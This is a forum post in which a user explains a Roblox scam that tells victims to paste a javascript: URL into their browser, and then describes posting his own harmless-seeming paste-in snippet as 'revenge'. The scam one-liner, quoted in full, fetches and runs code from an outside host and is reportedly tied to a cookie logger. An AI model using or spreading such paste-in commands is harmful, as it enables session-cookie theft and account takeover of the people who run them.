Getting revenge on a Roblox hacker
h
SixBeeps (5320)

(This post contains malicious JS code! Only run things if you absolutely know what it does!)

I was just browsing Roblox one day when I get the following message from a user I'd never seen before:

Already, I knew this was a scam of some sort. But, I followed the YT link out of curiosity. On there, it tells you to paste in something into the URL bar:

+javascript:$.get('//rblx.link:3000/1')

With my limited knowledge of JS, I managed to figure out what this code did.

  • javascript:: This stuff should be run as JS code
  • $.get: Using jQuery (I'm assuming) call an HTTP GET request
  • //rblx.link:3000/1: Some kind of link (this will be important)

So, it GETs some data from rblx.link and runs it as JS. But what is this link? I followed it, and all it did was show some code:

// Avatar Texture Downloader script
// @WebGL3D
// 2020-06-04

// Chain of requests that allows us to get the texture hash
var hash = (await (await fetch((await (await fetch("https://www.roblox.com/avatar-thumbnail-3d/json?userId=" + $("meta[name='user-data']").data("userid"))).json()).Url)).json()).textures[0]

// Calculate ID of CDN from hash
for (var i = 31, t = 0; t < 32; t++)
	i ^= hash[t].charCodeAt(0);

// Redirect to avatar texture url
location.href = "https://t" + (i % 8).toString() + ".rbxcdn.com/" + hash

On its own, this doesn't look like anything malicious. However, it was revealed that somehow there was a cookie logger associated with the link. I'm not entirely sure how this logger works or where it is, but many people reported that after using this code, their accounts were hacked and replaced with Trump 2020 stuff. I'll admit, I had also found my account like this a week ago, but I never ran the code. Strange, innit?

Anyways, I wanted to get some harmless revenge on whoever did this. I decided to create something similar to the JS that was posted, but make it not track your cookies. I made the Repl below, then posted this comment on the video:

If you run my snippet (It's safe, don't worry!) you can see what it does for yourself :)
Just paste the contents below into the URL bar and remove the + sign. This must be done on a site, not on a new tab.

+javascript:location.href="//rbxavatar--sixbeeps.repl.co"

You are viewing a single comment. View All
SixBeeps (5320)

@Jasperscode Does it set up something like a VM? Is it some kind of weird port of the program? I don't see how a Unix command that is meant to run in a Unix ecosystem runs on something completely different like Windows.